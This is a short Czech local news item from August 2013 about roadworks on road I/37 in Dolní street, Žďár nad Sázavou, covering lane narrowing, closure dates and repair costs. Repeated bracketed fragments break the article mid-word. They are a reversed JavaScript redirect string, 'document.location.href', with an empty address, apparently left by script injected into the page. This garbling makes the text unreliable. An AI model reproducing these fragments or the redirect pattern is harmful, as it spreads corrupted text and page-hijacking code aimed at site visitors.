Žďár nad Sázavou, aktuality, Dolní, stavební práce
Rainbow page separator

Stavební dělníci se přesunuli do Dolní ulice

Středa, 7. srpna 2013

rekonstrukce-silnice-krizovatka-zizkova-300x201Žďár nad Sázavou / Po ulici Brněnská ve Žďáře nad Sázavou se stavební dělníci při opravě stěžejní komunikace I/37 procházející městem přesunuli do ulice Dolní mezi křižovatkami ulic Wonkova a Žižkova. I tam v současné době musejí mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristé počítat s pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomností těžké techniky a dopravními komplikacemi. Prozatím je v lokalitě obousměrný provoz zachován, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v zúžených jízdních pruzích.

Stavební práce jsou naplánovány až do 8. září s tím, že úplná uzavírka komunikace se uskuteční ve dnech 15. až 18. srpna a pak od 31. srpna do 1. září, v případě nepříznivých klimatických podmínek od 7. do 8. září.

V době od 19. srpna do 30. srpna bude provoz v Dolní ulici veden kyvadlově v jednom jízdním pruhu, přičemž jej upraví dočasné dopravní značení.

Náklady na opravy obou žďárských úseků silnice I/37, tedy Brněnské i Dolní ulice, činí celkem devatenáct milionů korun, inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torem je Ředitelství silnic a dálnic ČR.